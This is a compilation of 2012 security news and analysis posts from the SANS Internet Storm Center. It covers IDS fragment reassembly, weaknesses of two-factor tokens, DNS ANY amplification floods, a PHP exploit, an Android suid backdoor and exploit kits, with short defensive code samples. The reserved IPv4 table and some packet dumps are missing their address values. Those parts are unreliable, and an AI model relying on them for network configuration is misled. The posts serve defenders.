If you compare the reassembled pattern to what was outlined in Judy Novak's paper, you will recognize the BSD reassembly pattern. So you will see all the attack packets that are targeted at a host using the BSD reassembly methodology, but not ones targeted at the other reassembly policies (First, Last, BSD-Right and Linux). You would not see overlapping fragmentation attacks targeted at both Windows and Linux. However, Security Onion now (as of build 20120518 [8]) has a Python script called "reassembler.py". If you provide reassembler.py with a pcap that contains fragments, it will reassemble the packets using each of the 5 reassembly engines and show you the result. It will even write the 5 versions of the packets to disk so you can examine binary payloads as the target OS would see them. Let's see what reassembler does with the fragmented packets we just created.
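The policy differences are easy to demonstrate without any packets at all. Below is a toy sketch (this is not reassembler.py, and it is deliberately simplified to just two policies, "first" and "last") showing how the same overlapping fragments yield different payloads depending on which fragment "wins" the overlap:

```python
# Toy model of overlapping-fragment reassembly.
# Fragments are (byte_offset, payload) pairs, listed in arrival order.
def reassemble(fragments, policy):
    buf = {}
    for offset, data in fragments:
        for i, byte in enumerate(data):
            pos = offset + i
            if policy == "first" and pos in buf:
                continue  # "first" policy: the earlier fragment's byte wins
            buf[pos] = byte  # "last" policy: later fragments overwrite
    return bytes(buf[i] for i in range(min(buf), max(buf) + 1))

frags = [(0, b"AAAA"), (2, b"BBBB")]  # bytes at offsets 2-3 overlap
print(reassemble(frags, "first"))  # b'AAAABB'
print(reassemble(frags, "last"))   # b'AABBBB'
```

An IDS that reassembles with one policy and an analyst tool that uses another will disagree on the payload; that disagreement is exactly the gap reassembler.py closes.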


Now you can see exactly what the IDS saw and make the correct decision when analyzing your packet captures. If using the Onion isn't an option for you, you can download reassembler.py directly from my SVN at http://baggett-scripts.googlecode.com/svn/trunk/reassembler/. How do you handle this? What are some other ways to solve this problem? Leave a comment.

Security Onion creator Doug Burks and I are teaching together in Augusta GA June 11th - 16th.  Come take "SEC503 Intrusion Detection In-Depth" from Doug or "SEC560 Network Penetration Testing and Ethical Hacking" from me BOOTCAMP style!  Sign up today! [9]

Mark Baggett



[1] http://www.freebsd.org/doc/handbook/firewalls-pf.html
[2] http://www.pfsense.org/
[3] http://sysadminadventures.wordpress.com/2010/11/02/why-pfsense-is-not-production-ready/
[4] http://www.snort.org/snort-downloads/additional-downloads
[5] http://securityonion.blogspot.com/
[6] http://www.icir.org/vern/papers/activemap-oak03.pdf
[7] http://www.snort.org/assets/165/target_based_frag.pdf
[8] http://securityonion.blogspot.com/2012/05/security-onion-20120518-now-available.html
[9] http://www.sans.org/community/event/sec560-augusta-jun-2012




Published: 2012-05-22

When factors collapse and two factor authentication becomes one.

The benefits of two factor authentication are pretty much Security 101 material. We are also told that two factors are more than "password 1" and "password 2". RSA, for example, one of the leaders in two factor authentication, defines this pretty nicely:

"Two-factor authentication is also called strong authentication. It is defined as two out of the following three proofs:

  • Something known, like a password,
  • Something possessed, like your ATM card, or
  • Something unique about your appearance or person, like a fingerprint."

There are a number of ways these factors can collapse. For example, for a one-time password token, the user typically needs to remember a password, or a PIN, as a second factor. Users tend to write this password on the back of the token, collapsing the factors. Now you only need to "possess" the token. In a more elaborate case, I ran into a user who had a webcam at home pointed at the token (he always forgot his token at home). Now all you needed to access the system was "something known" (the URL of the webcam and the password).

Tokens themselves pose a different threat of collapsing factors. Tokens operate by calculating a hash of an internal secret ("seed") and either a timestamp or a counter. You may not know the seed, but someone else may. This issue came up with the recent breach of RSA, which may have led to the leak of these seeds. The "seed" should not be directly related to the serial number printed on the device, but in the RSA case, it was alleged that the stolen data included some form of lookup table like that. RSA's algorithm to calculate the token value had already been leaked years earlier. Of course, for software tokens in particular, the algorithm can be reverse engineered. Evidently, someone now managed to do just that, and to retrieve the seed value from the software token [3]. Physical tokens are usually hardened to prevent someone from stealing the seed value, in particular from doing so undetected. In many ways, a "token" is a secret that you don't know.

What should you do about all this?

- Know the limitations of two factor authentication and educate your users. Two factors aren't the end of password attacks, but they make them substantially harder.
- Stolen or lost tokens need to be deactivated immediately. This includes soft tokens. Soft tokens need to be invalidated even if the device is later recovered.
- If you are auditing an organization, watch for "collapsed factors".
- Some two factor authentication systems, like the standards-based time-based and HMAC-based one-time password systems [4][5], usually expose the seed during setup. It is also typically rather easy to "clone" tokens in these settings (e.g. Google Authenticator uses TOTP). You may want to set up the token for users, or at least ensure that the seed is transmitted and entered securely.
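To illustrate why the seed is everything: the standard TOTP/HOTP algorithms [4][5] are public, so anyone holding the seed can compute valid token values at will. A minimal sketch using only the standard library, checked against the RFC test vector for time 59:

```python
import hashlib
import hmac
import struct
import time

def hotp(seed, counter, digits=6):
    """RFC 4226: HMAC-SHA1 over the counter, dynamically truncated."""
    digest = hmac.new(seed, struct.pack(">Q", counter), hashlib.sha1).digest()
    offset = digest[-1] & 0x0F
    code = struct.unpack(">I", digest[offset:offset + 4])[0] & 0x7FFFFFFF
    return str(code % 10 ** digits).zfill(digits)

def totp(seed, for_time=None, step=30, digits=6):
    """RFC 6238: HOTP with the counter derived from the current time."""
    if for_time is None:
        for_time = time.time()
    return hotp(seed, int(for_time // step), digits)

# RFC test seed; at time 59 the 6-digit value is 287082
print(totp(b"12345678901234567890", for_time=59))
```

With a stolen seed table, an attacker runs exactly this computation and the "something possessed" factor collapses into "something known".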

[1] http://www.rsa.com/glossary/default.asp?id=1056
[2] http://www.theregister.co.uk/2011/03/18/rsa_breach_leaks_securid_data/
[3] http://arstechnica.com/security/2012/05/rsa-securid-software-token-cloning-attack/
[4] http://tools.ietf.org/html/rfc6238
[5] http://tools.ietf.org/html/rfc4226


Johannes B. Ullrich, Ph.D.
SANS Technology Institute


Published: 2012-05-22

The "Do Not Track" header

A recent proposal, supported by many current web browsers, suggests the addition of a "Do Not Track" (DNT) header to HTTP requests [1]. If a browser sends this header with a value of "1", it indicates that the user would not like to be "tracked" by third party advertisers. The server may include a DNT header of its own in responses to indicate that it does comply with the do-not-track proposal.
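On the receiving end, honoring the proposal comes down to checking a single request header. A hypothetical sketch (the function name and decision logic are illustrative, not part of any specification):

```python
def tracking_allowed(headers):
    """Return False if the client sent the "DNT: 1" opt-out header."""
    # Only the value "1" expresses an opt-out; an absent header means
    # the user has expressed no preference either way.
    return headers.get("DNT") != "1"

print(tracking_allowed({"DNT": "1"}))  # False: skip third-party trackers
print(tracking_allowed({}))            # True: no preference expressed
```

The hard part, of course, is not reading the header but actually changing server behavior based on it, which is where the voluntary nature of the proposal bites.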

The proposal focuses on third party advertisements. It does suggest retention periods for first parties (2 weeks for all logs, up to 6 months for security relevant logs) to retain some compatibility with compliance standards that require specific logging schemes and retention times.

The biggest problem with this standard, aside from user awareness, is the fact that it is all voluntary. There is no technical means to enforce that a web site treats your data in accordance with the DNT header. Some legal protections are in the works, but as usual, they will probably only apply to legitimate advertisers, who are likely going to comply anyway. DNT will only matter if enough advertisers sign up to respect it. It is kind of like the "robots.txt" file, and could even be abused for user tracking, as it makes browsers even more "unique" and thus identifiable without the use of cookies or other tracking mechanisms. [3]

If you are concerned about tracking by third party sites, you need to not load content from third party sites, in particular ads and additional trackers (like cookies). Various ad blockers will help with this. Of course at the same time, you are violating the implicit contract that keeps many sites afloat: For letting you watch my content for free, my advertisers will track you. 

At the same time, users overwhelmingly don't appear to care much about privacy.  The "Do Not Track" header is usually not enabled by default. I don't think many users know about it, or how to enable it. The URL listed below has instructions on how to enable it, and will tell you if it is enabled in your browser. On the ISC website, the number of users with DNT enabled went from about 3.4% to 5.1%, which shows that while DNT adoption in our more technical readership is picking up, it is still rather low.

As far as this website is concerned: We do continuously try to refine our site to "leak less" of our visitors information. For example, we recently switched to a privacy enhanced social sharing toolbar. Our site is also using https for most parts. Aside from the obvious encryption advantage, this will prevent referrer headers from being included if you are clicking on a not-https link on our site.

Our biggest issue right now is the use of Google Analytics, and Google Ads in a couple spots, but I am reviewing these, and am looking for a replacement for Google Analytics. Over time, I hope to have less and less third party content on the site that could be used to track visitors, whether or not they have the "Do Not Track" feature enabled.

[1] http://donottrack.us/
[2] http://tools.ietf.org/id/draft-mayer-do-not-track-00.txt
[3] https://panopticlick.eff.org/

Johannes B. Ullrich, Ph.D.
SANS Technology Institute


Published: 2012-05-22

nmap 6 released

nmap 6 was released earlier today; it is a major upgrade over the previous version. One feature that excites me in particular is "full IPv6 support", including OS fingerprinting.

In order to efficiently scan IPv6 networks, nmap added multicast requests to enumerate live hosts on a network.

For more details, see http://nmap.org/6

Johannes B. Ullrich, Ph.D.
SANS Technology Institute


Published: 2012-05-21

DNS ANY Request Cannon - Need More Packets

We have a report from our reader Tuukka, who observed a flood of DNS ANY requests from likely spoofed IP addresses. What we know so far is that it seems to be a DNS reflective amplification attack. These usually use generic recursive DNS queries trolling for poorly configured DNS services. This event is different in that the reflection is more targeted. DNS 'ANY' record queries are only sent for domains for which the server is authoritative, which the server will of course reply to regardless of available recursion. These events have been validated by real-time observation by one of our handlers. Here is what we know so far.
Hit List: 
  • Source IP is spoofed
  • Flood lasts up to 60 seconds with 500 queries (as witnessed, but likely could be more)
  • Flood comes from a designated IP and seems to target multiple domains on the authoritative server
  • All observed requests are similar thus far
  • This appears to be similar to what others have seen [1]

Example DNS Log Entry:
  • x.x.x.x is the spoofed/target server
  • example.com/ is the "reflecting" DNS server
21-May-2012 13:21:41.757 queries: info: client x.x.x.x#20475: view external: query: example.com IN ANY + (
21-May-2012 13:21:41.897 queries: info: client x.x.x.x#59247: view external: query: example.com IN ANY + (
21-May-2012 13:21:42.054 queries: info: client x.x.x.x#18676: view external: query: example.com IN ANY + (
21-May-2012 13:21:42.059 queries: info: client x.x.x.x#28530: view external: query: example.com IN ANY + (
21-May-2012 13:21:42.193 queries: info: client x.x.x.x#6489: view external: query: example.com IN ANY + (
We are interested in knowing if you have seen this and what you have done to mitigate any ill effects of such events.  Please post a comment to let us know.
We also want your DNS logs and packet capture logs of the events described in this diary.  There is still plenty to learn about this behavior.
If you see outbound ANY query floods from your own network: Try to identify the source machine. It would be interesting to see what tool causes these queries.
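If you want to triage your own logs for this pattern, here is a quick sketch that counts ANY queries per client in BIND query-log lines of the format shown above (hedged: the exact log format varies with BIND version and logging configuration, so adjust the regex to your logs):

```python
import re
from collections import Counter

# Matches BIND query-log lines like the samples above.
QUERY_RE = re.compile(r"client (\S+)#\d+: .*query: (\S+) IN ANY")

def count_any_queries(lines):
    """Count 'IN ANY' queries per client IP."""
    counts = Counter()
    for line in lines:
        match = QUERY_RE.search(line)
        if match:
            counts[match.group(1)] += 1
    return counts

log = [
    "21-May-2012 13:21:41.757 queries: info: client x.x.x.x#20475: view external: query: example.com IN ANY + (",
    "21-May-2012 13:21:41.897 queries: info: client x.x.x.x#59247: view external: query: example.com IN ANY + (",
]
print(count_any_queries(log))  # Counter({'x.x.x.x': 2})
```

Any single client racking up hundreds of ANY queries in under a minute, as in the reported floods, is worth a closer look.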
ISC Handler on Duty


Published: 2012-05-19

PHP 5.4 Exploit PoC in the wild

Clarifications/Updates to the original diary:

- This is NOT remotely exploitable. An exploit would require the attacker to upload PHP code to the server, at which point the attacker could just use PHP to run shell commands via "exec".

- Only the Windows version is vulnerable.

- On Windows, the "COM" functions are part of the PHP core, not an extension.

- This is not at all related to the (more serious) CVE-2012-2336 vulnerability mentioned below. The com_print_typeinfo vulnerability is now known as CVE-2012-2376.


--- original report by Manuel ----


There is a remote exploit in the wild for PHP 5.4.3 in Windows, which takes advantage of a vulnerability in the com_print_typeinfo function. The PHP engine needs to execute the malicious code, which can include any shellcode, like the ones that bind a shell to a port.

Since there is no patch available for this vulnerability yet, you might want to do the following:

  • Block any file upload function in your PHP applications to avoid the risk of exploit code execution.
  • Use your IPS to filter known shellcodes, like the ones included in Metasploit.
  • Keep PHP at the latest available version, so you are not exposed to other vulnerabilities such as CVE-2012-2336, registered at the beginning of the month.
  • Use your HIPS to block any possible buffer overflow in your system.

Manuel Humberto Santander Peláez
SANS Internet Storm Center - Handler
e-mail: msantand at isc dot sans dot org


Published: 2012-05-18

ZTE Score M Android Phone backdoor

The ZTE Score M phone, apparently available via Metro PCS in the US, comes with a special suid backdoor. The backdoor, for a change, does not use a fixed "secret" root password. Instead, the suid binary "sync_agent" has to be called with a special parameter.

If you do have an Android phone, check whether you have this binary in "/system/bin". At this point, only this one particular model is reported to ship with it, but it would not be surprising if ZTE used the same backdoor on other models.

Cataloging and limiting suid applications should be a standard Unix hardening step. The simplest way, in my opinion, to find suid binaries is this find command:

find / -xdev -type f -perm -4000    # -xdev stays on one filesystem; use -x on BSD/OS X

Files with the suid bit set will run as the user owning the file, not as the user executing it. This is typically used to allow normal users to execute particular administrative tasks. So verify whether you need to execute a particular binary as a normal user before removing the suid bit.
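If find syntax differs across your systems, the same check is a few lines in Python's standard library (a sketch; error handling for unreadable directories is minimal):

```python
import os
import stat

def is_suid(path):
    """True if the setuid bit is set, i.e. the file runs as its owner."""
    return bool(os.stat(path).st_mode & stat.S_ISUID)

def find_suid(root):
    """Walk a tree and yield paths of setuid files."""
    for dirpath, _dirnames, filenames in os.walk(root):
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                if is_suid(path):
                    yield path
            except OSError:
                pass  # unreadable entry; find would print a warning here

# Example: list setuid binaries under /usr/bin
# for path in find_suid("/usr/bin"):
#     print(path)
```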

Update: The file has also been found on the ZTE Skate.


Johannes B. Ullrich, Ph.D.
SANS Technology Institute


Published: 2012-05-17

ISC Feature of the Week: Tools->Information Gathering


One of the sections on the ISC Tools page is Information Gathering at https://isc.sans.edu/tools/#info-gathering. This collection will help you easily find out how your browser and plugins look to the outside and lists some other information lookup tools.


Browser Headers - https://isc.sans.edu/tools/browserinfo.html
How a server sees your browser.

Browser Plugin Detector - https://isc.sans.edu/tools/adobinator.html
This page attempts to detect various browser plugins. The detection code used was created using PluginDetect.

  • Lists plugins detected and various version information for each.

Site Availability Check - https://isc.sans.edu/tools/sitecheck.html
Checks if hostname is reachable.

  • Single input box.
  • Displays failure if unreachable.
  • If reachable, outputs:
    • Page load time
    • Page size in bytes
    • Return status code (i.e. 200 = success)
    • Final URL

Site DNS Check - https://isc.sans.edu/tools/dnscheck.html
Hostname to IP DNS resolver.

  • Single input box.
  • Output IP if system is able to resolve.

Whereis[IP] - https://isc.sans.edu/tools/whereis.html

  • Multi-line input box. Enter one(1) IP per line.
  • Output table contains:
    • IP ADDRESS queried
    • ASN of IP
    • NETWORK assignment
    • COUNTRY abbreviation
    • ISP name
    • RIR - Name of registry

Content Security Policy Test - https://isc.sans.edu/tools/csptest.html
Created for Firefox 4 but features may be found in other browsers.

  • Lots of details and information on the test outlined and explained on the page


Post suggestions or comments in the section below or send us any questions or comments in the contact form on https://isc.sans.edu/contact.html#contact-form
Adam Swanger, Web Developer (GWEB, GWAPT)
Internet Storm Center https://isc.sans.edu



Published: 2012-05-17

Do Firewalls make sense?

Once in a while, someone comes up with the idea that firewalls are really not all that necessary. Most recently, Roger Grimes of Infoworld [1][2]. I am usually of the opinion that we definitely probably need firewalls. But I think the points made by the anti-firewall faction offer some insight into not only why we really need firewalls, but also what people don't understand about firewalls.

To clarify from the start: I am talking here about good old basic network firewalls. No deep packet inspection rules and no host based firewalls.

From a security point of view, firewalls offer two main functions: They regulate traffic, and they provide logs. The second part is often neglected. But look over some of the stories here, and quite frequently, you will find cases in which firewall logs tripped the scale. For example the "duplicate DNS response" issue earlier this week was initially found by an observant reader watching firewall logs.

When it comes to filtering, some consider firewalls not worth the trouble because "they only filter on ports that are closed on the server anyway". I think this shows a lack of understanding of what a firewall can do to protect servers. My best firewall wins usually came from outbound filtering of traffic trying to leave the server.

The next argument against firewalls is that there are usually better devices to do the filtering: proxies have real application insight, and router and switch ACLs can usually pick up the low-end port filtering. As far as the proxy is concerned: I say get one too. But proxies are usually rather complex devices to configure correctly, and I'd rather get the easy stuff out of the way first using a firewall. At the same time: how do I make sure my traffic actually uses the proxy? That typically involves a firewall.

A switch or a router may have many features that are found in a classic firewall (even stateful rules and some application logic). They may be perfectly fine for a home user or a small business. However, in an enterprise context in particular, you probably want to split the firewall functionality out to a different device, and with that to a different group of people. The people dealing with routing and network performance ("packet movers") are usually not the same people dealing with firewalls and filtering ("packet droppers").

But how many "modern" attacks are really blocked by firewalls? Aren't they all sending a spear phishing email to the user, tricking the user into downloading malware some Chinese kid wrote, via the filtering proxy we installed? Next they exfiltrate the data via that same proxy (or DNS, or SMTP... or other services we have to allow)? In part, these modern attacks are a testament to the effectiveness of firewalls. An attacker would probably rather still use the same tool they used back in the 90s to brute force file sharing passwords and download data straight from the system. But sadly for them, because now even some universities block file sharing using a firewall, these attacks no longer work.

Against these modern attacks, we have other defenses. Some may work against the older versions of these attacks as well. In short, these defenses can be summarized as "end point protection" (whitelisting, anti-virus, host based firewall, hardening of the system...). Hardening a large number of end points is, however, a lot more difficult than configuring a few well-placed firewalls at the right choke points.

By now, you are probably asking yourself: why hasn't he talked about "defense in depth" yet? The argument doesn't really apply if you are trying to argue for removing a device. Each additional security device can be justified with "defense in depth". But some security devices do not add enough value to justify the expense. I don't think "defense in depth" itself can be used to justify a *particular* security device. It rather justifies the fact that some of our security devices are redundant and fulfill similar, but not identical, roles.

To summarize: If the last time you looked at your firewall rules and logs was back in 2003 to stop SQL Slammer, you may as well get rid of it. But a well managed and configured firewall can have significant value. It is one of the simpler security devices you probably have. Consider it the good, reliable six-shooter compared to the fancy (but sometimes flaky) F-22. Which one are you going to take along to get money from the ATM that just appeared in the DEFCON hotel lobby? ;-)

Thoughts? Flames? Use the comment feature or send us a non-public comment via the contact form.

[1] http://www.infoworld.com/d/security/the-firestorm-over-firewalls-193409
[2] http://www.networkworld.com/news/2005/070405perimeter.html

Johannes B. Ullrich, Ph.D.
SANS Technology Institute


Published: 2012-05-16

Reserved IP Address Space Reminder

As we are running out of IPv4 address space, many networks, instead of embracing IPv6, stretch existing IPv4 space via multiple levels of NAT. NAT then uses "reserved" IP address space. However, there are more address ranges reserved than those listed in RFC1918, and not all of them should be used in internal networks. Here is a (probably incomplete) list of address ranges that are reserved, and which ones are usable inside your network behind a NAT gateway.

List of Reserved IPv4 Address Ranges

Address Range       RFC       Suitable for Internal Network           RFC1122   no ("any" address)            RFC1918   yes       RFC6598   yes (with caution: if you are a "carrier")         RFC1122   no (localhost)       RFC3927   yes (with caution: zero configuration)         RFC1918   yes          RFC5736   no (not used now, may be used later)           RFC5737   yes (with caution: for use in examples)          RFC3068   no (6-to-4 anycast)         RFC1918   yes           RFC2544   yes (with caution: for use in benchmark tests)         RFC5737   yes (with caution: test-net used in examples)         RFC5737   yes (with caution: test-net used in examples)           RFC3171   no (multicast)             RFC1700   no (or "unwise"? reserved for future use)

Most interesting in this context is RFC6598 (, which was recently assigned to provide ISPs with a range for NAT that is not going to conflict with their customers' NAT networks. It has become a more and more common problem that NAT'ed networks, once connected with each other via for example a VPN tunnel, have conflicting assignments.

Which networks did I forget? I will update the table for a couple days as comments come in.

Johannes B. Ullrich, Ph.D.
SANS Technology Institute


Published: 2012-05-16

Got Packets? Odd duplicate DNS replies from 10.x IP Addresses

This is a clarification of Dan's diary from yesterday. We are interested to hear if anybody else is seeing DNS replies from RFC1918 non-routable IP addresses, in particular from 10.x addresses. So far, we only have one report, and we are trying to figure out if this is something widespread, or something unique to this user.

This reader first noticed the problem when the firewall reported more dropped packets from 10.x addresses. Two example queries that caused the problem are A queries for 25280.ftp.download.akadns.net and adfarm.mplx.akadns.net. The reader receives two responses: One "normal" response from the IP address the query was sent to, and a second response from the 10.x address. As a result, the problem would go unnoticed even if the 10.x response is dropped. Both responses provide the same answer, so this may not be an attack, but more of a misconfiguration.

As a side note, initially the DNS protocol specifically allowed for replies to arrive from an IP address different from the one the query was sent to:

"Some name servers send their responses from different addresses than the one used to receive the query. That is, a resolver cannot rely that a response will come from the same address which it sent the corresponding query to. This name server bug is typically encountered in UNIX systems." (RFC1035)

However, later in RFC2181, this requirement was removed:

"Most, if not all, DNS clients, expect the address from which a reply is received to be the same address as that to which the query  eliciting the reply was sent.  This is true for servers acting as clients for the purposes of recursive query resolution, as well as simple resolver clients.  The address, along with the identifier (ID) in the reply is used for disambiguating replies, and filtering  spurious responses.  This may, or may not, have been intended when the DNS was designed, but is now a fact of life." (RFC2181)

But we are NOT looking for responses that merely come from the wrong source; we are looking for duplicate responses: one from the correct address and one from the incorrect address.
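Spotting this in a capture is a matter of noticing the same transaction ID answered from more than one source address. A toy sketch over (reply_source, transaction_id) pairs pulled from a capture (the data layout and the placeholder source names are illustrative):

```python
from collections import defaultdict

def duplicate_sources(responses):
    """Given (reply_source, transaction_id) pairs, return the transaction
    IDs that were answered from more than one source address."""
    seen = defaultdict(set)
    for src, txid in responses:
        seen[txid].add(src)
    return {txid: srcs for txid, srcs in seen.items() if len(srcs) > 1}

# Illustrative data: a normal reply plus a duplicate from the 10.x source,
# both carrying the same transaction ID as the sample packet below.
replies = [("ns.example.net", 0xB326), ("10.17.x.y", 0xB326)]
print(duplicate_sources(replies))  # flags transaction 0xb326 as answered twice
```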

Here is an example "stray" packet submitted by the reader (slightly modified for privacy reasons and to better fit the screen):


Internet Protocol Version 4, Src: 10.17.x.y, Dst: ---removed---
    Version: 4
    Header length: 20 bytes
    Differentiated Services Field: 0x00 
    Total Length: 84
    Identification: 0x2a7e (10878)
    Flags: 0x00
    Fragment offset: 0
    Time to live: 59
    Protocol: UDP (17)
    Header checksum: correct
User Datagram Protocol, Src Port: domain (53), Dst Port: antidotemgrsvr (2247)

Domain Name System (response)
    Transaction ID: 0xb326
    Flags: 0x8400 (Standard query response, No error)
        1... .... .... .... = Response: Message is a response
        .000 0... .... .... = Opcode: Standard query (0)
        .... .1.. .... .... = Authoritative: Server is an authority for domain
        .... ..0. .... .... = Truncated: Message is not truncated
        .... ...0 .... .... = Recursion desired: Don't do query recursively
        .... .... 0... .... = Recursion available: Server can't do recursive queries
        .... .... .0.. .... = Z: reserved (0)
        .... .... ..0. .... = Answer not authenticated
        .... .... ...0 .... = Non-authenticated data: Unacceptable
        .... .... .... 0000 = Reply code: No error (0)

    Questions: 1
    Answer RRs: 1
    Authority RRs: 0
    Additional RRs: 0


        ads.adsonar.akadns.net: type A, class IN
            Name: ads.adsonar.akadns.net
            Type: A (Host address)
            Class: IN (0x0001)


        ads.adsonar.akadns.net: type A, class IN, addr
            Name: ads.adsonar.akadns.net
            Type: A (Host address)
            Class: IN (0x0001)
            Time to live: 5 minutes
            Data length: 4
            Addr: (




Johannes B. Ullrich, Ph.D.
SANS Technology Institute


Published: 2012-05-15

Odd DNS replies from 10 nets and RFC1323 impacting firewalls

Reader Bob wrote in reporting increasingly frequent incoming DNS replies on UDP 53, with valid DNS answers, but coming from source addresses in the 10.x.x.x/8 range. The responses appear to be from the Internet root servers to DNS servers that are querying the roots.

Anyone else see this kind of behavior?

Over the past week another couple of readers have written in reporting issues accessing the ISC web page. The SANS NOC reports that RFC-1323 timestamps were getting scrubbed by our firewall to prevent information disclosure, but the checksum wasn't being updated.  The packet was subsequently dropped by the end device.

This appears to be impacting users using Bluecoat web proxies. We will have more to post on this topic throughout the day.

Handler Internet Storm Center


Published: 2012-05-14

Got packets? Interested in TCP/8909, TCP/6666, TCP/9415, TCP/27977 and UDP/7

We have noticed an increase in scanning activity to ports TCP/8909, TCP/6666, TCP/9415, TCP/27977 and UDP/7 and would love some packets if you have them. 

  • TCP/8909 - No idea what this is; it's a new one for me, and it is starting to trend.
  • TCP/6666 - This is probably going to be IRC, but it would be nice to confirm and see what is being scanned for.
  • TCP/9415 - This used to be associated with open proxies, but again, it would be good to get some packets to check.
  • TCP/27977 - My first thought was a gaming port, but that is just a guess.
  • UDP/7 - Echo, a blast from the past. Maybe they are looking for misconfigured or old routers and *nix boxes.

If you have any packets to the above please submit them through the contact form or email them to handlers -at- sans.edu or directly to me markh.isc -at- gmail.com

Thanks in advance.


Mark H


Published: 2012-05-14

Laptops at Security Conferences

I’m often curious what other security folks do to keep their machine safe when they go to IT conferences. I often see what look like standard office machines being used and wonder if any precautions have been taken. So here’s what I do, and I’d love to find out what other measures you take.

I’m about to spend a few days at a large security conference, so I’m just putting the finishing touches to the laptop I’m taking with me. As I don’t have any real needs beyond email, typing notes and web browsing, it’s a simple job of installing a clean OS and a couple of must-have applications*. In keeping with Joel’s previous diary, it took the duration of some reality TV show to install all the various patches to bring these apps up to date.

Now this is where I go through my normal additional hardening steps. This OS happens to be Windows 7, so I disable a bunch of services, kill IPv6 services, gleefully disable hibernation and add in a gaggle of firewall rules (or should that be an annoyance of firewall rules?).

The last thing I do is make a record of the clean state of the computer. This is the part I assume most companies have covered if they have managed operating environments (MOE) or standard operating environments (SOE), as it is such an easy thing to do and provides a trusted baseline for the security teams to compare against.

In Windows there’s a bunch of ways to ask the computer what’s running and what services and software are installed, but I like PowerShell, so here’s a quick and dirty way to get the info and save it to a file.

From a PowerShell prompt:

#Installed software
gp HKLM:\Software\Microsoft\Windows\CurrentVersion\Uninstall\* | Select DisplayName, DisplayVersion, Publisher, InstallDate, HelpLink, UninstallString | out-file c:\build\base.txt
#Running processes
Get-Process | sort Company | format-Table ProcessName -groupby Company | out-file -append c:\build\base.txt
#Services installed
Get-Service * | out-file -append c:\build\base.txt

This gives me three pieces providing a baseline** of the system.

I’m now ready to skip from vendor booth to vendor booth, keen to look at their product case studies conveniently loaded on handy novelty USB devices, while surfing the web on freely provided WiFi, doing on-line banking, checking today’s nuclear launch codes and wondering why I keep seeing "Loading Please Wait" when clicking on links in emails from people I’ve never heard of. Although this is an attempt at humour (note: attempt), having a baseline of the clean machine allows me to identify the more obvious signs of something bad happening to my system.

If I do feel a disturbance in the force or the laptop does something odd, I can re-run my simple PowerShell commands (with a different output name) and look for changes.

#Comparing in PowerShell
Compare-Object -ReferenceObject $(Get-Content c:\build\base.txt) -DifferenceObject $(Get-Content c:\build\new.txt)

That gives me a quick indication of whether something has changed on my system (barring rootkits) and whether I need to worry about it.
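For those who prefer scripting the comparison outside PowerShell, here is a minimal sketch of the same idea in Python (the service names below are made up purely for illustration): report which snapshot lines were added or removed between the baseline and the new capture.

```python
def diff_snapshots(base_lines, new_lines):
    """Compare two baseline snapshots, similar in spirit to Compare-Object:
    return (added, removed) lines as sorted lists."""
    base, new = set(base_lines), set(new_lines)
    return sorted(new - base), sorted(base - new)

if __name__ == "__main__":
    base = ["svc-dns Running", "svc-dhcp Stopped"]
    new = ["svc-dns Running", "svc-dhcp Stopped", "evil-svc Running"]
    added, removed = diff_snapshots(base, new)
    print("added:", added)      # ['evil-svc Running']
    print("removed:", removed)  # []
```

In practice you would feed it the contents of the two baseline files rather than hard-coded lists.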

Let me know what you do or don't do when taking your system to a conference.


* I can’t say I’m a big fan of live CD/DVD/USB; I see their uses, but they get out of date, especially the browsers, far too quickly.

**If you want to get fancier with the base snapshot, it’s pretty easy to script it out to include registry keys, firewall rules and even files in directories with cryptographic hashes.
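As an illustration of that fancier snapshot, here is a rough sketch of hashing every file under a directory (in Python rather than PowerShell, and the hash algorithm choice is my own assumption):

```python
import hashlib
import os

def hash_tree(root):
    """Return {relative_path: sha256_hexdigest} for every file under root,
    giving a file-integrity baseline to diff against later."""
    digests = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            h = hashlib.sha256()
            with open(path, "rb") as f:
                # Hash in chunks so large files don't need to fit in memory.
                for chunk in iter(lambda: f.read(65536), b""):
                    h.update(chunk)
            digests[os.path.relpath(path, root)] = h.hexdigest()
    return digests
```

Saving the returned dictionary to a file at build time and diffing it against a fresh run gives the same kind of before/after comparison as the text snapshots above, but at file granularity.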


Chris Mohan--- Internet Storm Center Handler on Duty


I’m mentoring SANS Hacker Guard 464 class in Sydney on the 7th of August - SysAdmins, this is for you! https://www.sans.org/mentor/class/sec464-sydney-aug-2012-mohan


Published: 2012-05-13

Exploit Kits are a mess

As many of the Internet Storm Center readers know, my full time job is working for Sourcefire, the makers of SNORT, ClamAV, Razorback, Daemonlogger, and all of our commercial products.  I work in the Vulnerability Research Team (VRT), where my job is to write detection for the above tools: Snort rules, ClamAV detection, etc.  I often write about Snort-related things here, since I know the SANS audience uses Snort heavily; it is even taught in the 503 course.

One of the areas that I've been looking at and following even more intently recently have been all the Exploit Kits.  I refer to things like Incognito, Blackhole, Crimepack, and many more.

Let me give you a couple external references to go read in case you have no idea what I am talking about:

Brian Krebs has some blog posts here and here about some updates to it.  But for a basic explanation of how the Blackhole kit exploits you, the end user, I suggest this PDF here.

The Blackhole exploit kit in particular is very actively developed and changes rapidly in response to things that block its exploit methods.  Trust me.  As a person who follows all the particular versions of these exploit kits, they change just about weekly.

You can be exploited by various kits simply by going to a website where some injected code rests on the page (you'll never see it; this is what we call a "drive-by"), by receiving some spam (LinkedIn, USPS, UPS, I've even seen fake pizza delivery emails delivering things like the Phoenix exploit kit) that redirects you to a "landing page", or by receiving spam with an html/htm email attachment.  The possibilities are essentially endless on how you can wind up on an exploit kit landing page.

Once on the landing page, there are lots of different ways the exploit kit can figure out how to take over your computer, but the basic question the landing page asks is "which piece of software didn't this user patch?".  Vulnerabilities in browsers, Java, even the delivery of a PDF to exploit a vulnerable version of Adobe Reader.

These kits are all over the place, and most likely, you are going to run into one of these (if you haven't already).

I basically have three pieces of advice for you.

1)  Don't open spam, or click on links inside of spam, or generally just be careful of the sites you go to.  If you are reading this webpage, you know there is a 'wild west' to the Internet.  Be careful.

2) Patch.  Everything.  Java, browsers, OS, Adobe Reader, etc.  Everything.  I literally cannot stress the importance of this enough.

3) Run AV and if you are on a corporate network, run an IPS. 

This is an evolving threat.  Nothing is going to 100% protect you all the time, however, the more layers you have, hopefully the more insulated you are against the threat, and you can protect yourself and your users.  

Good Luck!

-- Joel Esler | http://blog.joelesler.net | http://twitter.com/joelesler



Published: 2012-05-12

Adobe Update to Vulnerabilities

